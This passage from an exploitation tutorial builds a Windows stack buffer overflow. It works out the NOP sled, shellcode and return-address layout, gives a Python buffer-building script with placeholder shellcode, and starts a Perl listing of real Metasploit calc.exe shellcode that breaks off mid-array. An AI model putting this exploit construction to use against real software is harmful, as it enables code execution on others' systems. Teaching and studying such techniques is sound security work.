(Or you can just paste in the C-formatted shellcode and add a period after each line.) This version of the shellcode is 164 bytes, and we want the shellcode and our NOPs to fill 404 bytes in total, so we'll start with a 24-byte NOP sled and put 216 more NOPs (or anything, really) after the shellcode: 24 + 164 + 216 = 404. We also need to subtract 408 bytes (0x190 + 0x8) from the return address so that it points at the top of our NOP sled, where execution will slide right into our shellcode. Let's try it out!
NOTE: Depending on the version of Metasploit and the other settings you select, the size of your shellcode may vary. It is the process that is important here, not the exact size of the example.
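The buffer layout described above, written out as an added example (this is not code from the book or from Metasploit). It assumes the 408-byte adjustment is 404 bytes of payload plus 4 bytes of saved-EBP filler before the overwritten return address, and it uses a constructed 164-byte placeholder (int3 instructions) in place of the real win32_exec payload and an assumed stack address of 0x0012fb00 in place of the one the debugger showed. The trailing NOP count is derived from the payload length rather than hard-coded, which is what the note about varying shellcode sizes asks for, and the payload is checked for NUL bytes before the buffer is built.

```python
import struct

# Layout figures from the text: a 404-byte overflow buffer, a 24-byte NOP
# sled at its start, and a return address moved back 0x190 + 0x8 = 408 bytes.
BUFFER_LEN = 404
SLED_LEN = 24
RET_ADJUST = 0x190 + 0x8
NOP = b"\x90"

# Constructed stand-in for the 164-byte win32_exec shellcode: 164 int3s.
# Replace with the Metasploit output when you run this for real.
SHELLCODE = b"\xcc" * 164


def check_shellcode(shellcode: bytes) -> None:
    """Reject payloads that a C string copy would truncate or that will not fit."""
    if b"\x00" in shellcode:
        raise ValueError("shellcode contains a NUL byte; re-encode it")
    if len(shellcode) > BUFFER_LEN - SLED_LEN:
        raise ValueError("shellcode does not fit after the NOP sled")


def adjust_return(found_addr: int) -> int:
    """Move the recorded address back so it lands at the top of the sled."""
    return found_addr - RET_ADJUST


def layout(shellcode: bytes, sled_len: int = SLED_LEN) -> dict:
    """Byte budget of the 404-byte buffer, so it can be checked before firing."""
    return {
        "sled": sled_len,
        "shellcode": len(shellcode),
        "trailer": BUFFER_LEN - sled_len - len(shellcode),
    }


def build_buffer(shellcode: bytes, found_addr: int, sled_len: int = SLED_LEN) -> bytes:
    """NOP sled + shellcode + filler NOPs, then saved-EBP filler and the return address."""
    check_shellcode(shellcode)
    parts = layout(shellcode, sled_len)
    payload = NOP * parts["sled"] + shellcode + NOP * parts["trailer"]
    assert len(payload) == BUFFER_LEN
    # Assumption: 4 bytes of saved EBP sit between the payload and the return
    # address slot (404 + 4 = 408), which is why the text subtracts 408.
    # The address is packed as a little-endian DWORD, as x86 expects.
    return payload + b"A" * 4 + struct.pack("<I", adjust_return(found_addr))


if __name__ == "__main__":
    # 0x0012fb00 is an assumed stack address; the page's real value is not
    # in this excerpt.
    buf = build_buffer(SHELLCODE, 0x0012FB00)
    print(layout(SHELLCODE), hex(adjust_return(0x0012FB00)), len(buf))
```

The NUL check applies to the shellcode and the NOPs only: a stack address such as 0x0012f968 ends in a zero byte once packed, but since the return address is the last thing copied, that byte simply terminates the string and does no harm.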
C:\grayhat>type command.pl
# win32_exec - EXITFUNC=thread CMD=calc.exe Size=164 Encoder=PexFnstenvSub
# http://metasploit.com
my $shellcode =
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb6".
"\x9d\x6d\xaf\x83\xeb\xfc\xe2\xf4\x4a\x75\x29\xaf\xb6\x9d\xe6\xea".
"\x8a\x16\x11\xaa\xce\x9c\x82\x24\xf9\x85\xe6\xf0\x96\x9c\x86\xe6".
"\x3d\xa9\xe6\xae\x58\xac\xad\x36\x1a\x19\xad\xdb\xb1\x5c\xa7\xa2".
"\xb7\x5f\x86\x5b\x8d\xc9\x49\xab\xc3\x78\xe6\xf0\x92\x9c\x86\xc9".
"\x3d\x91\x26\x24\xe9\x81\x6c\x44\x3d\x81\xe6\xae\x5d\x14\x31\x8b".